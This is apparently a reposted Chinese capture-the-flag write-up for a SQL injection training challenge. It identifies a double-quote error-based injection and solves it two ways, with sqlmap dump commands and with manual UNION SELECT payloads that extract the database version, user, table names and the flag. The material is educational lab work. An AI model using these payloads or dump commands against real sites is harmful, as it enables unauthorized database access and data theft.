zoukankan      html  css  js  c++  java
  • #writeup# 深交所CTF内训T1-SQL注入

    T1:SQL 注入

    hint:简单的注入漏洞,可以使用sqlmap工具。
    题目地址:http://www.szse.ml:8080/szse-1/index.php

    简单的sql注入,先判断是何种注入类型。
    http://www.szse.ml:8080/szse-1/index.php?id=1 正常显示
    http://www.szse.ml:8080/szse-1/index.php?id=1' 单引号正常显示,说明不是单引号注入
    http://www.szse.ml:8080/szse-1/index.php?id=1" 显示异常,说明要用双引号闭合。

    注意报错信息,数字1能显示,说明不是整形注入,而是字符注入。整形注入的报错长这样:

    大致可以推断出后台sql语句是

    sql = 'select username, password from xxx_table where id = ("' + $id + '") LIMIT 0,1'

    接下来都是常规操作,判断当前表格有多少个字段。当4改为3的时候,显示正常,说明有3个字段。

    判断哪些字段可以回显。说明第2个和第3个字段可以回显。

    通过上面的分析,可以知道,这是一道 ** GET - Error based - Double Quotes - string “ 注入题目,没有做任何过滤。

    接下来,有两种解题方式:

    方法一:利用sqlmap

    通过前面的人工分析,知道id存在注入,而且是 error-based,所以构造如下命令:

    sqlmap -u "http://www.szse.ml:8080/szse-1/index.php?id=1" -p id --dbms mysql --technique E

    关于 --technique 参数,简单介绍如下:
    这个参数可以指定sqlmap使用的探测技术,默认情况下会测试所有的方式。
    支持的探测方式如下:
    B: Boolean-based blind SQL injection(布尔型注入)
    E: Error-based SQL injection(报错型注入)
    U: UNION query SQL injection(可联合查询注入)
    S: Stacked queries SQL injection(可多语句查询注入)
    T: Time-based blind SQL injection(基于时间延迟注入)

    接下来探测数据库名,在上一条命令尾部加上 --current-db

    查看有哪些表:-D security --tables

    查看表中的内容:-T szseflag --dump

    获得了flag。

    提高
    sqlmap 在探测时候,会用到各种方法,其中盲注探测方式最花时间,为了提高效率,需要了解 --time-sec/--thread 等参数。当服务端存在过滤的时候,还要调用--tamper 脚本进行绕过。

    方法二:直接手工注入

    本题为基本的sql注入,而且带回显,其实完全可以通过手工语句完成:
    1、获得数据库基本信息
    数据库版本:
    http://www.szse.ml:8080/szse-1/index.php?id=-1")+union+all+select+1,version(),3%23

    如果是5.0以上,因为有information_schema函数,可以直接获取到DB中的表和列信息。示例中是5.5.47
    数据库信息:
    http://www.szse.ml:8080/szse-1/index.php?id=-1")+union+all+select+1,database(),3%23
    security
    用户信息:
    http://www.szse.ml:8080/szse-1/index.php?id=-1")+union+all+select+1,user(),3%23
    root@localhost

    2、获取表和列信息
    http://www.szse.ml:8080/szse-1/index.php?id=-1")+union+all+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database() %23

    emails,referers,szseflag,uagents,users
    http://www.szse.ml:8080/szse-1/index.php?id=-1")+union+all+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name='szseflag' %23
    flag

    6、获取字段信息
    http://www.szse.ml:8080/szse-1/index.php?id=-1")+union+all+select+1,flag,3+from+szseflag%23

    szse{sqli_welcome_szse_ctfer}

    方法三:自己编程实现

    在 error-based sqli中,原理和手工注入一样,没必要编程。
    在盲注的时候,就需要编程实现了。这里不再展开,希望大家可以自己做做这道题目:。
    http://www.szse.ml:8080/Less-8/

    提升

    所有的 sqli 题目,其实都在 sqli-labs 里面了,只要每一题都能搞定,相信比赛也没问题。
    目前 sqli-labs 的比赛环境我已经搭建好了,欢迎刷题:
    http://www.szse.ml:8080/

    注意,一共有4类关卡哦:

  • 相关阅读:
    vmware导出为ovf
    华三接入交换机推荐
    mysql root情况
    ospf精确宣告地址
    kubernetes k8s yum localinstall
    js判断邮箱、用户名、手机号码和电话号码是否输入正确?
    如何修改Oracle中表的字段长度?
    mybatis与hibernate区别
    SSM框架的优势?
    SSH框架的优势?
  • 原文地址:https://www.cnblogs.com/handt/p/12589934.html
Copyright © 2011-2022 走看看